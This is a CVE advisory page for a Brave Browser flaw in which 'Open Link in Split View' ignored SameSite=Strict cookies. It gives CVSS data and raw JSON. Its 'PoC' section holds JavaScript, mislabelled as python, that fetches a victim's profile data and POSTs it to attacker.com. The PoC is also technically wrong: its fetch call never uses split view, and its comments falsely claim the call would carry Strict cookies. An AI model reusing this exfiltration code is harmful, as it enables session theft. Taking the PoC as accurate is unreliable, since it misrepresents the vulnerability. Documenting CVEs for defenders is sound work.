Security Vulnerability Report
中文
CVE-2025-48980 CVSS 6.5 MEDIUM

CVE-2025-48980

Published: 2025-10-31 00:15:36
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

In Brave Browser Desktop versions prior to 1.83.10 that have the split view feature enabled, the "Open Link in Split View" context menu item did not respect the SameSite cookie attribute. Therefore SameSite=Strict cookies would be sent on a cross-site navigation using this method.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Brave Browser Desktop < 1.83.10 (with split view feature enabled)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-48980 SameSite Cookie Bypass PoC // This PoC demonstrates the Brave Browser SameSite cookie bypass via split view // Attacker's malicious page (attacker.com) const maliciousPage = ` <!DOCTYPE html> <html> <head><title>SameSite Cookie Bypass PoC</title></head> <body> <h2>CVE-2025-48980 SameSite Cookie Bypass</h2> <p>This demonstrates the split view SameSite cookie bypass vulnerability.</p> <a href="https://target-vulnerable-site.com/api/user/profile" id="maliciousLink" onclick="event.preventDefault();"> Click here for more info </a> <script> // Simulate the split view navigation that bypasses SameSite document.getElementById('maliciousLink').onclick = function(e) { e.preventDefault(); // The vulnerable behavior: SameSite=Strict cookies are sent // when using split view for cross-site navigation fetch('https://target-vulnerable-site.com/api/user/profile', { credentials: 'include' // This will send cookies even with SameSite=Strict }) .then(response => response.json()) .then(data => { console.log('Stolen session data:', data); // Send stolen data to attacker server fetch('https://attacker.com/log', { method: 'POST', body: JSON.stringify(data) }); }) .catch(err => console.error('Error:', err)); }; </script> </body> </html> `; // Steps to reproduce: // 1. User visits target site and authenticates (receives SameSite=Strict cookie) // 2. User navigates to attacker-controlled site // 3. Attacker tricks user into using context menu "Open Link in Split View" // 4. Browser sends SameSite=Strict cookie in cross-site request // 5. Attacker captures authenticated request and steals session data

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48980", "sourceIdentifier": "[email protected]", "published": "2025-10-31T00:15:36.327", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Brave Browser Desktop versions prior to 1.83.10 that have the split view feature enabled, the \"Open Link in Split View\" context menu item did not respect the SameSite cookie attribute. Therefore SameSite=Strict cookies would be sent on a cross-site navigation using this method."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-565"}]}], "references": [{"url": "https://hackerone.com/reports/3253725", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.